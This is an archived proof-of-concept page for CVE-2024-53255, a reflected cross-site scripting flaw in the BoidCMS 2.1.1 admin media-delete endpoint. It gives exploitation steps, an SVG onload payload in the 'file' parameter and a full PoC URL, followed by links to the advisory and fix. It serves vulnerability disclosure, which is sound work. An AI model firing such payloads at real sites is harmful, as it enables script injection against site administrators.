CVE-2024-53255 PoC — BoidCMS 安全漏洞

Source

https://github.com/0x4M3R/CVE-2024-53255

Associated Vulnerability

Title:BoidCMS 安全漏洞 (CVE-2024-53255)
Description:BoidCMS是BoidCMS开源的一个免费的开源平面文件 CMS，用于构建简单的网站和博客，使用 PHP 开发并使用 JSON 作为数据库。 BoidCMS 2.1.1及之前版本存在安全漏洞，该漏洞源于文件参数中的/admin?page=media端点存在反射型跨站脚本(XSS)漏洞，允许攻击者注入任意JavaScript代码。

Description

boid CMS 2.1.1 - reflected Cross-Site Scripting (XSS)

Readme

# CVE-2024-53255
boid CMS 2.1.1 - reflected Cross-Site Scripting (XSS)

# Description:

A reflected XSS vulnerability exists in the /admin?page=media endpoint in the file parameter, allowing an attacker to inject arbitrary JavaScript code

# Steps to exploit:

1- Login to the CMS and Navigate to the delete page (/admin?page=media).

2- Select any file to delete and intercept the request using a proxy tool.

3- Modify the file parameter in the intercepted request to:

```
<svg+onload%3dalert(document.domain)>
```
4 - Forward the modified request and the injected script will execute.

Proof of concept (Poc):

```
http://localhost/boidcms/admin?page=media&action=delete&file=<svg+onload%3dalert(document.domain)>&token=693b471d9ee886766b69fd0dab9d992cd7f0e1e483822b28b6e8bcde0cf502e4
```

For details:
https://nvd.nist.gov/vuln/detail/CVE-2024-53255
https://www.cve.org/CVERecord?id=CVE-2024-53255
https://github.com/BoidCMS/BoidCMS/commit/42f4d703a87f5199bbd701b3495a26c91b9cfab7
https://github.com/BoidCMS/BoidCMS/security/advisories/GHSA-7q7m-cgw8-px4r

File Snapshot


 [4.0K]  /data/pocs/d606f211b0d25e490e53c8e3256ca268bc638f61
└── [1.0K]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!